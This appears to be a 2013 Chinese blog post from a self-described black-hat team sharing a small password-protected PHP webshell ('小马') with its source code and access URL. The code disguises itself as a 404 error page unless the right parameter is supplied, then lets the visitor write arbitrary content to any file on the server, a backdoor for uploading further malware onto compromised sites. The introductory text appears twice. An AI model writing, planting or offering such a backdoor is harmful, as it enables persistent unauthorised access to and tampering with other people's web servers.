#34;密码"的PHP小马黑帽专版
来源:韦江代博客 责任编辑:栏目编辑 发表时间:2013-07-01 04:28 点击:次
+---------------------------------------------------------------------------+;
Author:VcOr[BHST]
Name:Black-Hat Security Team
+---------------------------------------------------------------------------+;
最近学习php,写了一个php小马,所以的带密码其实不是很恰当.
另外我利用系统的404.htm错误页面来做隐士,增加隐藏性.这样就不用担心自己的木马被别人找到了.
呵呵,写得不好,大家有什么好意见尽量提.
代码如下:
http://url/bhst.php?bhst=vcor 即可以访问到自己的小马进行上传.
Author:VcOr[BHST]
Name:Black-Hat Security Team
+---------------------------------------------------------------------------+;
最近学习php,写了一个php小马,所以的带密码其实不是很恰当.
另外我利用系统的404.htm错误页面来做隐士,增加隐藏性.这样就不用担心自己的木马被别人找到了.
呵呵,写得不好,大家有什么好意见尽量提.
代码如下:
复制内容到剪贴板
当正常访问.bhst.php时就会跳出提示页面不存在的404错误提示,要正确访问如下连接:代码:
<?php
$mode="vcor";//密码修改这个地方就可以了.
if($_REQUEST['bhst']!=$mode)
{
echo "<iframe src=bhst width=100% height=100% frameborder=0></iframe> ";
exit;
}
?>
<?php
if ($_POST)
{
$f=fopen($_POST["f"],"w");
if(fwrite($f,$_POST["c"]))
echo "<font color=red>Good Luck!</font>";
else
echo "<font color=blue>Fail!</font>";
}
?>
<title>Black-Hat Security Team Pony By VcOr</title>
<form action="" method="post">
Pony:<input type="text" size=48 name="f" value='<?php echo $_SERVER["SCRIPT_FILENAME"];?>'>
<input type="submit" id="b" value="HackIt"><br>
<textarea name="c" cols=60 rows=9></textarea>
</form>
<p></p>
By VcOr[B.H.S.T]http://url/bhst.php?bhst=vcor 即可以访问到自己的小马进行上传.
相关新闻>>
- 发表评论
-
- 最新评论 更多>>